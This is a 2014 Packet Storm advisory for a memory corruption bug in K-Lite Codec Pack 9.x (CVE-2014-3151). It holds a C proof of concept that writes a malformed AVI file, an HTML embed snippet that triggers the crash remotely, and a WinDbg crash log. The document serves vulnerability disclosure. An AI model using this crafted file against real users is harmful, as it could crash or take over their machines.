K-Lite CODEC 9.x Memory Corruption

2014-05-05T00:00:00
ID PACKETSTORM:126474
Type packetstorm
Reporter Aryan Bayaninejad
Modified 2014-05-05T00:00:00

Description

                                        
                                            `# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]  
# Date: [2014/05/3]  
# Author: [Aryan Bayaninejad]  
# Linkedin : https://www.linkedin.com/profile/view?id=276969082  
# Vendor Homepage: [http://www.codecguide.com]  
# Software Link: [  
http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]  
# Version: [version 9.x and prior]  
# Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit]  
# CVE : [CVE-2014-3151]  
# Found by Piece Dumb Fuzzer  
  
Details:

K-Lite Codec Pack version 9.x and prior are vulnerable to a memory corruption
vulnerability that allows remote attackers to execute arbitrary code and take
control of the system via a malformed AVI file.

Tested on "Windows Media Player latest edition", Internet Explorer, GOM
Player and KM Player, on Windows XP and 7, x64 and x86.

--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to trigger memory corruption:
  
#include <stdio.h>
#include <windows.h>

/* 154-byte malformed AVI: a RIFF/"AVI " header and a LIST chunk whose declared
   sizes (0x000A5E44 and 0x0000FC7C) are far larger than the file, followed by
   0x41 filler. The filler is what ends up in eax/ecx in the WinDbg output below. */
unsigned char sc[154] =
{
    0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20, 0x4C, 0x49, 0x53, 0x54,
    0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E, 0xFC, 0xFF, 0xFF, 0xFF,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
    0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41
};

int main(int argc, char *argv[])
{
    HANDLE fileHandle = INVALID_HANDLE_VALUE;
    DWORD dwBytesWritten = 0;

    /* Write the sample to d:\poc.AVI, overwriting any existing file. */
    fileHandle = CreateFile("d:\\poc.AVI", GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
                            NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (fileHandle == INVALID_HANDLE_VALUE)
    {
        printf("(-) Failed to Create File\n");
        return 1;
    }
    printf("(+) Writing File ...\n");
    WriteFile(fileHandle, sc, sizeof(sc), &dwBytesWritten, NULL);
    CloseHandle(fileHandle);
    return 0;
}
  
  
--------------------------------------------------------------------------------------------------------------------------------------------------
PoC to remotely trigger memory corruption:

<embed type="application/x-mplayer2"
       pluginspage="http://www.microsoft.com/Windows/MediaPlayer/"
       name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false"
       autostart="false" height="330" width="360" loop="false"
       src="D:/PoC.avi" />
  
  
  
WinDbg result:

Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach
Symbol search path is: c:\netw0rm\symbols
Executable search path is:
ModLoad: 01000000 01013000 C:\Program Files\Windows Media Player\wmplayer.exe
ModLoad: 02f30000 02f9e000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\LAVSplitter.ax
ModLoad: 6f640000 6f753000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avformat-lav-55.dll
ModLoad: 69f00000 6aac0000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avcodec-lav-55.dll
ModLoad: 6f540000 6f581000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\avutil-lav-52.dll
ModLoad: 02c00000 02c32000 C:\Program Files\K-Lite Codec Pack\Filters\LAV\libbluray.dll
ModLoad: 02fe0000 03176000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV
ModLoad: 133d0000 1340f000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax
ModLoad: 031d0000 03206000 C:\Program Files\Common Files\Roxio Shared\9.0\MPEG\RoxioMPEGDemuxer.dll
ModLoad: 03210000 0329b000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\splitter.ax
ModLoad: 02fc0000 02fd7000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkzlib.dll
ModLoad: 032b0000 032bc000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\mkunicode.dll
ModLoad: 03330000 03350000 C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ntdll.dll -
(a20.f58): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240 edi=00000044
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!wcsncpy+0x905:
7c910ede 8b39 mov edi,dword ptr [ecx] ds:0023:41414141=????????